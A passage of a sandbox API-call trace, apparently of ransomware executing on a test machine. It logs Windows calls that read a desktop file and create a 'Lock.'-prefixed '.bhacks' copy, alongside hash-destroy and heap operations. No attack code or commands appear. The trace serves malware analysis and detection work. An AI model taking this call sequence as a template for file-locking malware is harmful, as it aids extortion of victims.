lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.756] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0101.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.757] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/J_gUxI4K04bkqo7tW4.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0101.757] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.757] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0101.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0101.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a759c0 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.759] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a759c0 | out: hHeap=0x2af0000) returned 1 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.759] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.J_gUxI4K04bkqo7tW4.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.j_guxi4k04bkqo7tw4.avi.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0101.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0101.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0101.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0101.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0101.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0101.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4ca1020 [0101.764] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0101.764] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xfb70, lpOverlapped=0x0) returned 1 [0101.766] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0101.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0101.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb70) returned 0x2a7a130 [0101.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca1020 | out: hHeap=0x2af0000) returned 1 [0101.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0101.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0101.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0101.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0101.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb70) returned 0x2a89ca8 [0101.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0101.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb70) returned 0x2a7a130 [0101.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0101.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0101.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0101.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0101.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0101.874] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0101.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0101.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0101.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb70) returned 0x2a7a130 [0101.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0101.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0101.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0101.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb70) returned 0x37c0048 [0101.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0101.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0101.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0101.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0101.880] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0101.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0101.881] PeekMessageW 